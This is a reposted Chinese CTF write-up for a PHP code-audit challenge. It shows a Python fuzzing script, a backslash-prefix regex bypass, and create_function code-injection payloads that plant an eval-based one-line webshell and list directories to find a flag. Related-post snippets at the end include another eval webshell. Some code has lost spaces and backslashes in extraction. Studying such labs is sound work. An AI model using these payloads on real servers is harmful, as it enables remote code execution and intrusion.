php action function,代码审计从入门到放弃(一) & function

最新推荐文章于 2022-12-06 18:47:28 发布
最新推荐文章于 2022-12-06 18:47:28 发布
阅读量161 收藏 1
点赞数
文章标签: php action function
本文介绍了如何通过字符fuzz绕过PHP代码审计中的正则过滤,利用`create_function`实现代码注入并获取flag。文章详细讲解了正则表达式的Bypass技巧,以及在代码审计过程中寻找getshell函数的方法,适合学习PHP安全和代码审计的读者。
摘要由CSDN通过智能技术生成

原标题:代码审计从入门到放弃(一) & function

前言

题目概述

漏洞点思考

字符fuzz

getshell函数寻找

getflag

相关实验操作

小结

前言

CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-breaking.com

刚发布的时候一直忙于学业和一些琐事,没法认真研究和学习,最近闲下来了,于是打算填下这个坑~

题目ph牛均已开源至github:https://github.com/phith0n/code-breaking(必须starXD)

题目概述

$action= $_GET['action'] ?? '';

$arg= $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD',$action)) {

show_source(__FILE__);

}else {

$action('', $arg);

}

源码言简意赅,首先是希望我们输入两个参数

$action= $_GET['action'] ?? '';

$arg= $_GET['arg'] ?? '';

其中双问号为三元运算表达式,等价于

$action= $_GET['action'] ? $_GET['action']: '';

$arg= $_GET['arg'] ? $_GET['action']: '';

即输入两个参数,若输入,则取我们的输入,否则为空

然后是对$_GET['action']的正则表达式过滤

if(preg_match('/^[a-z0-9_]*$/isD',$action)

如果不被匹配到正则,则可以进行如下操作

$action('',$arg);

漏洞点思考

题目意思也很简单,我们的关注点应该停留到正则匹配上,因为一旦绕过正则,则可以进行危险函数构造,成功getshell或是读取文件,我们先来看一下正则/^[a-z0-9_]*$/isD的意思:

/i不区分大小写

/s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[fnrtv]

/D如果使用$限制结尾字符,则不允许结尾有换行;

那么很显然,所有以数字,字母,下划线等开头的value都会被过滤,我们无法进入下面的

$action('',$arg);

那么现在的目的很简单:

按照正则的意思,找到一个不是以数字,字母,下划线等开头的value,同时可以正常执行函数

我们曾经有如下正则Bypass的样例

if(preg_match('/^(.*)flag(.*)$/',$payload))

对于^开头,$结尾的正则,如果用.进行任意字符匹配,那么则不包括换行符

所以这种情况我们可以用%0a进行bypass

正常输入flag:

b533b38a45b312175ae563ade38e7e96.png

利用%0a进行bypass:

ebc30e370659895d0baee2349d9eda36.png

可以明显看出两张图的对比,这里我们利用%0a打头,成功bypass正则,达到任意input,那么我们也没有相同的思路去bypass现在的正则呢?

既然要顺应正则的意思,我们不妨看看有没有什么特殊字符可以达到一样的效果,不妨进行字符fuzz

字符fuzz

既然要找一个这样满足条件的字符,我们可以进行fuzz

importrequests

fori in range(1,256):

tmp= hex(i)[2:]

iflen(tmp)<2:

tmp= '0'+hex(i)[2:]

tmp= '%'+tmp

url= 'http://localhost:22000/?action='+tmp+'var_dump&arg=23333'

r =requests.get(url=url)

if'23333' in r.content:

printr.content

printurl

可以得到结果

string(0)""

string(5)"23333"

http://106.14.114.127:22000/?action=%5cvar_dump&arg=23333

[Finishedin 5.3s]

我们发现当且仅当使用%5c打头时,我们可以正常运行var_dump(),并且成功满足正则。

那么这是为什么呢?

ph牛有如下总结

php里默认命名空间是,所有原生函数和类都在这个命名空间中。

普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;

而如果写function_name()这样调用函数,则其实是写了一个绝对路径。

如果你在其他namespace里调用系统类,就必须写绝对路径这种写法

同时我们参考php手册

http://www.php.net/manual/zh/language.namespaces.rationale.php

其中有如下样例代码:

namespacemyname;

classMyClass {}

constMYCONST = 1;

$a =new MyClass;

$c =new mynameMyClass;

$d =namespaceMYCONST;

$d =__NAMESPACE__ . 'MYCONST';

echoconstant($d);

?>

可以很直观的看出对比,以及的用法

getshell函数寻找

那么既然现在我们找到了利用进行正则bypass的方法,则需要找一个合适的getshell/ readfile函数

这里注意到参数的构造方式

$action('',$arg);

很显然,需要一个可以输入至少2个参数的函数,同时第二个参数存在RCE的风险

这里可以简单翻阅我之前写的PHPCommand / Code Injection Summary

链接如下

https://skysec.top/2018/03/09/php-command%20or%20code-injection-summary/

不难找到如下函数

stringcreate_function ( string $args , string $code )

通过官方样例

$newfunc= create_function('$a,$b', 'return "ln($a) + ln($b) = " .log($a * $b);');

echo"New anonymous function: $newfuncn";

echo$newfunc(2, M_E) . "n";

//outputs

//New anonymous function: lambda_1

//ln(2) + ln(2.718281828459) = 1.6931471805599

?>

我们可以得到create_function()这样的原型

functiontest($a,$b)

{

return"ln($a) + ln($b) = " . log($a * $b);

}

第一个参数控制函数的变量名,第二个参数控制函数内的代码

那么我们这里

$action('',$arg);

可以说很容易进行代码注入拼接达到bypass,例如

$arg= return "2333";}phpinfo();/*

我们不妨带入

functiontest($a,$b)

{

return"2333";

}

phpinfo();

/*}

可以发现,这样即可进行RCE,我们测试一下

http://localhost:22000/?action=%5ccreate_function&arg=return"2333";}phpinfo();/*

510a9eab014f1cab5774a3fe98f74dd0.png

发现成功执行了phpinfo

getflag

那么我们插入一句话木马

$arg= return "2333";}eval($_REQUEST['sky']);/*

得到

?action=%5ccreate_function&arg=return"2333";}eval($_REQUEST['sky']);/*&sky=system('ls');

但是得到回显

Warning:system() has been disabled for security reasons in/var/www/html/index.php(8) : runtime-created function(1) : eval()'dcode on line 1

那么我们更改命令

sky=var_dump(scandir('./'));

得到回显

array(3){ [0]=> string(1) "." [1]=> string(2) ".."[2]=> string(9) "index.php" }

我们继续查看上层目录

sky=var_dump(scandir('../'));

得到回显

array(4){ [0]=> string(1) "." [1]=> string(2) ".."[2]=> string(31) "flag_h0w2execute_arb1trary_c0de" [3]=>string(4) "html" }

至此,我们成功getflag

flag_h0w2execute_arb1trary_c0de

相关实验操作

1. 渗透PHP代码审计——学习PHP代码审计的基础知识,为以后的工作奠定基础

http://www.hetianlab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916230700001

651cd4e7a7c04337f8814fc7bbede175.png

2. 正则表达式——了解正则表达式,掌握sed和awk工具的使用

http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014120311252200001

86ecb07c88228fd23c45749ed8fba7ae.png

3. fuzz实践及module编写——了解fuzz的思想,根据需求进行module的编写及利用

http://www.hetianlab.com/expc.do?ec=ECID186f-336b-49d9-b256-4f9d1efcc565

961efc08273c73c81c10a47240c7e4d7.png

小结

本地考察的难点应该在于字符fuzz,用打头bypass过滤提供了一个不错的思路,在日后的bypass上,不妨进行相应的测试~

大家有好的技术原创文章

了解投稿详情点击重金悬赏 | 合天原创投稿等你来!

82085401254c7edf0d2e8250cb2d4b05.gif

戳 “阅读原文”一起来充电吧! 返回搜狐,查看更多

责任编辑:

weixin_39557813
关注
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
php入门放弃,代码审计入门放弃(三) & phplimit
weixin_39818727的博客
03-11 127
原创:一叶飘零前言本次是phplimit这道题,本篇文章提供了3种解法,即如何利用无参数函数进行RCE/任意文件读取题目概述题目源码如下:if(';'===preg_replace('/[^\W]+\((?R)?\)/','',$_GET['code'])){eval($_GET['code']);}else{show_source(__FILE__);}代码非常清晰,首先preg_repl...
PHP - 代码执行 - create_function()
3569
11-29 1757
https://paper.seebug.org/94/ create_function() 大致流程如下 1. 获取参数, 函数体; 2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串; 3. eval; 4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错; 5. 定义一个函数名:”\000_la...
action中写php函数,WordPress中add_action(将函数连接到指定action
weixin_33454080的博客
03-19 208
WordPress中add_action(将函数连接到指定action)首先说下WordPress中用的钩子,将一个函数,以一个新的动作命名,该函数就是语法:123add_action($tag,$function_to_add,$priority,$accepted_args);?>参数:$tag(字符串)(必填)$function_to_add 所挂载的动作(action)的名称。也可...
php中的action类,使用CAction类的事件
weixin_42548874的博客
03-18 686
简介虽然有很多好的文章介绍怎么使用事件和怎么把它们放到你的组件中,但是没有(我认为)文章介绍怎么在你的控制器中使用以下方法配置 CAction 类。事件通常按以下方式使用:在你的组件中声明事件并添加它的方法(即 function onClick($event))将事件附加到事件处理程序(event handlers)(即 $object->onClick = array($handleObj...
php action 用法,YII2框架中actions的作用与使用方法示例
weixin_42298279的博客
03-17 495
本文实例讲述了YII2框架中actions的作用与使用方法。分享给大家供大家参考,具体如下:我们常在控制器中看到一个actions的方法,这个方法具体的作用是共用一些功能相同的action,方便调用。当然我们也可以自已写一些action来进行调用。在项目目录下创建common目录,并创建TestAction.php文件。action文件的存放路径可以随意指定。//注意这里的命名空间,要跟你的目录对...
[代码审计篇]PHP代码审计入门(前置要点)
qq_43668710的博客
05-04 582
前言 为了更好的理解漏洞原理以及提升自己的挖洞能力,终于还是入坑了代码审计。况且这个想法已经在脑海中酝酿很久了,但由于方方面面的原因没能照顾到代码审计的学习,索性趁五一假期宅在家里有时间,所以打算正式把这门手艺安排上。 何为代码审计 简介 代码审计(Code audit)是一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。 即对源代码进行检查,寻找代码中会导致安全问题的bug(漏洞)。...
代码审计】那些代码审计的思路.md
最新发布
2201_75660665的博客
12-06 328
代码审计工具的实现都是基于代码审计经验开发出来用于优化工作效率的工具,我们要学好代码审计就必须要熟悉代码审计的思路。而且代码审计是基于PHP语言基础上学习的,学习代码审计最基本的要求就是能读懂代码。常见的代码审计思路有以下四种:根据敏感关键字回溯参数传递过程; 查找可控变量,正向追踪变量传递过程; 寻找敏感功能点,通读功能点代码; 直接通读全文代码。 敏感函数回溯参数过程 根据敏感函数来逆向追踪参数的传递过程,是目前使用的最多的一种方式,因为大多数漏洞是由于函数的使用不当造成的。另外非函数使用不当的漏洞,如
寒假AWD训练之初学代码审计
qq_42728977的博客
01-17 1273
寒假在家,老师组织了AWD训练赛,还是实战出真知,感觉比赛的学习效率是真的高。做个小总结。 也是刚入门,欢迎大佬斧正。 漏洞1:webshell.php 第一个漏洞是后门的,是一句话木马。 <?php @eval($_POST['moxiaoxi']) ?> 很简单,没有什么难度,可以直接菜刀,但是菜刀不能批量自动化获取flag。所以,尝试着写脚本。 import requests ...
网络安全入门与实践
网络安全是当今信息社会中至关重要的一环,涵盖了各种技术、措施和策略来防止网络受到恶意攻击和未经授权的访问。 ## 1.1 什么是网络安全 网络安全是指通过采取各种技术手段和管理措施,保护网络系统不受到未经...
Code-Breaking Puzzles easy - function(匿名函数利用)
烟敛寒林的博客
05-09 916
题目地址:http://120.78.164.84:49001/ <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action)) { show_source(__FILE__); } else { $action(...
ctf+create_function()+scandir()学习
weixin_44255856的博客
04-10 1262
php官方手册中发现create_function函数,就等同于function函数的作用; create_function函数 <?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n";...
phpaction中写啥,php中的 action 做参数 ,有什么特殊含义吗?见 代码
weixin_33529455的博客
03-11 1273
我在 学习php 5,对错误提示 设置为显示:有 下面代码:图形(周长&面积)计算器echo $_GET[“action”];?>运行了 http://localhost/xphp/tuxingjsq.php,点击 矩形 三角形,圆形的链接,不会出现错误提示。当我将 链接中的action 改为 其他的名字时 ,如:name ,出现了错误提示,如:图形(周长&面积)计算器...
代码审计入门放弃(一) & function
蚁景网安学院
03-07 526
前言题目概述漏洞点思考字符fuzzgetshell函数寻找getflag相关实验操作小结 前言CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-...
php中使用action示例
weixin_30768175的博客
10-09 1265
php中根据传入的参数:action名来执行相应的动作->函数的示例: <?php//actiontestfunctionshow(){echo"<showTest>这是一个actionshow测试</showTest>";}//根据action指定的操作调用相应的函数完成if(!empty($_POST['action'])){$...
PHP从HTML表单获取数据action问题
随时记
03-05 2272
1、phptext.html <html> <head> <title> Entering data into text fields </title> </head> <body> <h1> Entering data into text fields </h1> <fo...
Flex开发详解:从入门到实战
"flex从入门到实践" Flex是一个由Adobe公司推出的用于构建富互联网应用程序(RIA)的开源框架,特别适合创建具有高度互动性和丰富用户体验的Web应用。它基于组件,生成的程序由Flash Player运行,这使得Flex应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值